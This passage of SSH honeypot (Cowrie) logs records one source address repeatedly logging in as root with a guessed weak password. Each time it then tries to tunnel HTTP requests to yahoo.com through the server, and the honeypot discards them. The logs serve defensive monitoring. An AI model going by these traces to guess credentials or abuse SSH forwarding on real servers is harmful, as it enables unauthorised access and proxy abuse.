chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:07.787547Z","src_ip":"213.209.150.239","session":"fcd708db03af"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.022422Z","src_ip":"213.209.150.239","session":"fcd708db03af"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":22283,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:22283","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.070601Z","session":"fcd708db03af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.117888Z","src_ip":"213.209.150.239","session":"fcd708db03af"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":6882,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6882","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.253630Z","session":"fcd708db03af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.301026Z","src_ip":"213.209.150.239","session":"fcd708db03af"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.350641Z","src_ip":"213.209.150.239","session":"fcd708db03af"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54830,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c8419b68dae","protocol":"ssh","message":"New connection: 213.209.150.239:54830 (1.2.3.4:22) [session: 6c8419b68dae]","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.406135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.406945Z","src_ip":"213.209.150.239","session":"6c8419b68dae"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.463569Z","src_ip":"213.209.150.239","session":"6c8419b68dae"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.745666Z","src_ip":"213.209.150.239","session":"6c8419b68dae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":19485,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:19485","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.803423Z","session":"6c8419b68dae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:08.860217Z","src_ip":"213.209.150.239","session":"6c8419b68dae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":12283,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12283","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.015253Z","session":"6c8419b68dae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.071831Z","src_ip":"213.209.150.239","session":"6c8419b68dae"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.129315Z","src_ip":"213.209.150.239","session":"6c8419b68dae"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54885,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5e9ba49c88b","protocol":"ssh","message":"New connection: 213.209.150.239:54885 (1.2.3.4:22) [session: a5e9ba49c88b]","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.175311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.176252Z","src_ip":"213.209.150.239","session":"a5e9ba49c88b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.223284Z","src_ip":"213.209.150.239","session":"a5e9ba49c88b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.457493Z","src_ip":"213.209.150.239","session":"a5e9ba49c88b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":10847,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10847","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.506146Z","session":"a5e9ba49c88b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.553218Z","src_ip":"213.209.150.239","session":"a5e9ba49c88b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":30868,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30868","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.689426Z","session":"a5e9ba49c88b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.736670Z","src_ip":"213.209.150.239","session":"a5e9ba49c88b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.784546Z","src_ip":"213.209.150.239","session":"a5e9ba49c88b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54933,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4d7a8cffb5e","protocol":"ssh","message":"New connection: 213.209.150.239:54933 (1.2.3.4:22) [session: d4d7a8cffb5e]","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.830941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.831618Z","src_ip":"213.209.150.239","session":"d4d7a8cffb5e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:09.879187Z","src_ip":"213.209.150.239","session":"d4d7a8cffb5e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.114404Z","src_ip":"213.209.150.239","session":"d4d7a8cffb5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":28466,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:28466","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.162308Z","session":"d4d7a8cffb5e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.209846Z","src_ip":"213.209.150.239","session":"d4d7a8cffb5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":15407,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:15407","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.345592Z","session":"d4d7a8cffb5e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.392878Z","src_ip":"213.209.150.239","session":"d4d7a8cffb5e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.441129Z","src_ip":"213.209.150.239","session":"d4d7a8cffb5e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54970,"dst_ip":"1.2.3.4","dst_port":22,"session":"09c0bc66659c","protocol":"ssh","message":"New connection: 213.209.150.239:54970 (1.2.3.4:22) [session: 09c0bc66659c]","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.497005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.506712Z","src_ip":"213.209.150.239","session":"09c0bc66659c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.555323Z","src_ip":"213.209.150.239","session":"09c0bc66659c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.838977Z","src_ip":"213.209.150.239","session":"09c0bc66659c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":30299,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30299","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.896802Z","session":"09c0bc66659c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:10.953660Z","src_ip":"213.209.150.239","session":"09c0bc66659c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":19928,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:19928","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.107109Z","session":"09c0bc66659c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.163804Z","src_ip":"213.209.150.239","session":"09c0bc66659c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.221997Z","src_ip":"213.209.150.239","session":"09c0bc66659c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55032,"dst_ip":"1.2.3.4","dst_port":22,"session":"95034ad64721","protocol":"ssh","message":"New connection: 213.209.150.239:55032 (1.2.3.4:22) [session: 95034ad64721]","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.277822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.278761Z","src_ip":"213.209.150.239","session":"95034ad64721"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.335481Z","src_ip":"213.209.150.239","session":"95034ad64721"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.618831Z","src_ip":"213.209.150.239","session":"95034ad64721"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":3414,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:3414","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.676270Z","session":"95034ad64721"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.733279Z","src_ip":"213.209.150.239","session":"95034ad64721"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23059,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23059","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.891250Z","session":"95034ad64721"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:11.948159Z","src_ip":"213.209.150.239","session":"95034ad64721"}
